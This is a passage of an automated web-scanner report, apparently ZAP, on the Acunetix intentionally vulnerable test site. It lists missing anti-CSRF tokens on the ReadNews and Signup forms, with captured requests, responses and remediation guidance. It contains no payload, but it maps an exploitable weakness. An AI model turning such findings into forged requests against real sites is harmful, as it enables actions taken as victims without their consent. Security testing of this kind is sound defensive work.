          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        24. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
          Alert tags
          Alert description

          No anti-CSRF token was found in the submitted HTML form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
          Content-Length: 3761
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (3761 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17924
          
          
          Response body (17924 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZC
wgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8/ZtiayAG6OnQCA==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or that makes it easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        25. POST http://testaspnet.vulnweb.com/Signup.aspx
          Alert tags
          Alert description

          No anti-CSRF token was found in the submitted HTML form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" "btnSignup" "tbPassword" "tbUsername" ].

          Request
          Request line and header section (399 bytes)
          POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Signup.aspx
          Content-Length: 1098
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1098 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8wYbzXe%2BsXxDpSfVp4SwbIP85RvA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13177
          
          
          Response body (13177 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Signup</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Signup.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm"
          							align="center">
          							<TR>
          								<TD>Username:</TD>
          								<TD>
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD>
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD>
          							</TR>
          						</TABLE>
          						<BR>
